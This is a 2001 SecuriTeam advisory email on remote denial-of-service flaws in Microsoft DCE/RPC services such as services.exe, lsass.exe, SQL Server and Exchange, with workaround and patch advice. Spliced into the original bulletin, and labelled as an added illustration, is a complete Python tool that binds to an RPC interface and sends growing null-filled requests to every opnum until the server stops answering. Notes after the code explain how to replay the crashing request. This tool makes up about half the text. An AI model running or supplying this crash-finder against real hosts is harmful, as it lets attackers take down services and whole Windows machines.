[NT] Multiple Remote DoS Vulnerabilities in Microsoft DCE/RPC Daemons

From: support@securiteam.com
Date: 08/01/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Multiple Remote DoS Vulnerabilities in Microsoft DCE/RPC Daemons
Message-Id: <20010801192656.1F0B913901@mail.der-keiler.de>
Date: Wed,  1 Aug 2001 21:26:56 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Multiple Remote DoS Vulnerabilities in Microsoft DCE/RPC Daemons
------------------------------------------------------------------------

SUMMARY

Many DCE/RPC services do not validate the parameters of incoming requests
properly and can be crashed by sending an improperly formatted request.
This allows a remote attacker to deny service by taking down the affected
service (and, for some of the processes listed below, the host).

The following is a detailed technical report of the vulnerability:
Malformed RPC Request Can Cause Service Failure (Exchange, SQL, Windows):
http://www.securiteam.com/windowsntfocus/5BP0N2K4UY.html

DETAILS

Affected systems:
At least the following services are known to be affected. More services
are likely to be vulnerable. For a complete list of what Microsoft has
patched, see their security bulletin mentioned below.

W2K SCM (services.exe)
NT4 SCM (services.exe)
NT4 LSA (lsass.exe)
NT4 Endpoint mapper (Rpcss.exe)
W2K Endpoint mapper (svchost.exe (fixed by ms00-066))
SQL Server 7 (sqlservr.exe)
W2K's DHCP Server
W2K's IIS Server (inetinfo.exe)
Exchange 5.5 SP3 (STORE.exe)
Exchange 5.5 SP3 (MAD.exe)
NT4 Spooler (spoolss.exe)
W2K License Srv (llssrv.exe)
NT4 License Srv (llssrv.exe)

Impact:
An unauthenticated attacker who can reach the service over the network can
crash it. In some cases the service restarts itself; in others it stays
down until restarted by hand, and where the crashed process is a core one
such as services.exe or lsass.exe that means rebooting the host.

Details:
By sending successively larger requests containing nothing but nulls to
every operation (opnum) on every interface supported by a DCE/RPC service,
it is often possible to find a particular request that crashes the server.
The exhaustive search is only needed once: each service has a particular
request (or requests) that crash it, and once that request has been found
by grinding through all the possibilities, only that single request is
needed to crash the server again.
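The search described above, as an added illustration that is not part of the advisory or of BindView's tools: a minimal connection-oriented DCE/RPC (v5.0) PDU builder that binds to an interface, sends requests whose stub data is nothing but zero bytes of growing size to each opnum, and reports the first case after which the server stops answering. Assumptions: the target is a TCP endpoint (for instance one listed by rpcdump), the interface UUID used in the sample is the endpoint mapper's, and each request fits in a single fragment of the default 4280-byte frag size (larger stubs would need fragmentation, which is not shown). Named-pipe transport over SMB (ports 139/445) is not implemented here. The sample bind_ack and fault PDUs at the bottom are constructed, not captured.

```python
"""Minimal DCE/RPC CO PDU builder and null-stuffing fuzz driver (illustration)."""
import socket
import struct
import uuid

# PDU types from the DCE 1.1 RPC specification (section 12.1).
PTYPE_REQUEST, PTYPE_RESPONSE, PTYPE_FAULT = 0, 2, 3
PTYPE_BIND, PTYPE_BIND_ACK, PTYPE_BIND_NAK = 11, 12, 13
PFC_FIRST_LAST = 0x03                 # first and last fragment in one PDU
DREP_LE_ASCII_IEEE = b"\x10\x00\x00\x00"
MAX_FRAG = 4280                       # default max_xmit_frag / max_recv_frag
NCA_S_OP_RNG_ERROR = 0x1C010002       # fault status: opnum out of range

# NDR transfer syntax accepted by every DCE/RPC server.
NDR_SYNTAX = ("8a885d04-1ceb-11c9-9fe8-08002b104860", 2, 0)
# Assumed example target: the endpoint mapper interface (NT4 Rpcss.exe is listed as affected).
EPM_INTERFACE = ("e1af8308-5d1f-11c9-91a4-08002b14a0fa", 3, 0)


def _syntax(spec):
    """(uuid string, major, minor) -> 20-byte p_syntax_id_t; UUID is mixed-endian on the wire."""
    guid, major, minor = spec
    return uuid.UUID(guid).bytes_le + struct.pack("<HH", major, minor)


def _header(ptype, body_len, call_id, flags=PFC_FIRST_LAST):
    # rpc_vers, rpc_vers_minor, ptype, pfc_flags, drep, frag_length, auth_length, call_id
    return struct.pack("<BBBB4sHHI", 5, 0, ptype, flags, DREP_LE_ASCII_IEEE,
                       16 + body_len, 0, call_id)


def build_bind(interface, call_id=1, context_id=0):
    """Bind PDU offering one presentation context (interface + NDR transfer syntax)."""
    body = struct.pack("<HHI", MAX_FRAG, MAX_FRAG, 0)     # max xmit/recv frag, assoc group
    body += struct.pack("<BBH", 1, 0, 0)                   # one context element, padding
    body += struct.pack("<HBB", context_id, 1, 0)          # context id, one transfer syntax
    body += _syntax(interface) + _syntax(NDR_SYNTAX)
    return _header(PTYPE_BIND, len(body), call_id) + body


def build_null_request(opnum, stub_len, call_id, context_id=0):
    """Request PDU whose stub data is stub_len zero bytes: the advisory's test input."""
    if stub_len > MAX_FRAG - 24:
        raise ValueError("stub does not fit in one fragment; fragmentation not implemented")
    stub = b"\x00" * stub_len
    body = struct.pack("<IHH", len(stub), context_id, opnum) + stub   # alloc_hint, ctx, opnum
    return _header(PTYPE_REQUEST, len(body), call_id) + body


def parse_pdu(data):
    """Classify a server PDU: bind_ack acceptance, fault status, or response stub size."""
    vers, _, ptype, _, _, frag_len, _, call_id = struct.unpack("<BBBB4sHHI", data[:16])
    if vers != 5 or frag_len != len(data):
        raise ValueError("not a complete v5 PDU")
    info = {"ptype": ptype, "call_id": call_id}
    if ptype == PTYPE_BIND_ACK:
        addr_len = struct.unpack_from("<H", data, 24)[0]   # port_any_t after max frags/assoc group
        off = 26 + addr_len
        off += (-off) % 4                                  # p_result_list is 4-byte aligned
        result = struct.unpack_from("<HH", data, off + 4)  # first p_result_t: result, reason
        info["accepted"] = data[off] >= 1 and result[0] == 0
    elif ptype == PTYPE_FAULT:
        info["status"] = struct.unpack_from("<I", data, 24)[0]   # after alloc_hint, ctx, cancel, pad
    elif ptype == PTYPE_RESPONSE:
        info["stub_len"] = frag_len - 24
    return info


def null_request_cases(opnums, max_stub=MAX_FRAG - 24, step=256):
    """Every opnum, with stub sizes growing from 0 up to the single-fragment limit."""
    for opnum in opnums:
        for size in range(0, max_stub + 1, step):
            yield opnum, size


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed connection")
        buf += chunk
    return buf


def _recv_pdu(sock):
    head = _recv_exact(sock, 16)
    return head + _recv_exact(sock, struct.unpack_from("<H", head, 8)[0] - 16)


def fuzz_tcp_endpoint(host, port, interface, opnums, timeout=5.0):
    """Send each null-stuffed request on a fresh connection; return the first
    (opnum, size) after which the server no longer answers, or None."""
    for opnum, size in null_request_cases(opnums):
        try:
            with socket.create_connection((host, port), timeout) as s:
                s.sendall(build_bind(interface))
                if not parse_pdu(_recv_pdu(s)).get("accepted"):
                    raise RuntimeError("interface not accepted by %s:%d" % (host, port))
                s.sendall(build_null_request(opnum, size, call_id=2))
                parse_pdu(_recv_pdu(s))          # response or fault: server still alive
        except (socket.timeout, ConnectionError):
            return (opnum, size)
    return None


def _sample_bind_ack():
    """Constructed (not captured) bind_ack accepting context 0 on TCP port 135."""
    addr = b"135\x00"
    body = struct.pack("<HHI", MAX_FRAG, MAX_FRAG, 0x1234) + struct.pack("<H", len(addr)) + addr
    body += b"\x00" * ((-(16 + len(body))) % 4)
    body += struct.pack("<BBH", 1, 0, 0) + struct.pack("<HH", 0, 0) + _syntax(NDR_SYNTAX)
    return _header(PTYPE_BIND_ACK, len(body), 1) + body


def _sample_fault(status):
    """Constructed fault PDU: alloc_hint, ctx, cancel_count, reserved, status, reserved2."""
    body = struct.pack("<IHBBII", 0, 0, 0, 0, status, 0)
    return _header(PTYPE_FAULT, len(body), 2) + body


SAMPLE_BIND_ACK = _sample_bind_ack()
SAMPLE_FAULT = _sample_fault(NCA_S_OP_RNG_ERROR)
```

A fault carrying status 0x1C010002 (nca_s_op_rng_error) means the opnum does not exist on the interface, so probing opnums 0, 1, 2, ... with an empty stub until that fault appears gives the number of operations to enumerate before the size sweep starts. Only the last (opnum, size) pair returned needs to be kept; replaying it is enough to reproduce the crash.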

The exact endpoints on which a server listens vary from service to service.
Many listen on named pipes, which are reachable through SMB on TCP port 139
or (on W2K) 445. Other services, e.g. Exchange, typically listen on both TCP
and UDP ports above 1024. Services that do not listen on named pipes can
usually be enumerated through the endpoint mapper (TCP/UDP port 135) with
rpcdump. rpcdump comes with the NT resource kit; a free version is also
available on the RAZOR web site in the rpctools package.

If COM Internet Services has been installed and enabled, then these
attacks may be possible over port 80, as well. This is not a default
configuration, however.

Workarounds:
Use a firewall to block access to the affected services from untrusted
networks as far as possible: the SMB ports (139, 445), the endpoint mapper
(135), the dynamic ports above 1024 used by services such as Exchange, and
port 80 where COM Internet Services is enabled.

Recommendations:
- Install the appropriate patches from Microsoft (see
  http://www.securiteam.com/windowsntfocus/5BP0N2K4UY.html).
- Do not install COM Internet Services unless it is actually needed.

ADDITIONAL INFORMATION

The information has been provided by Todd Sabin of BindView
<tsabin@razor.bindview.com>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
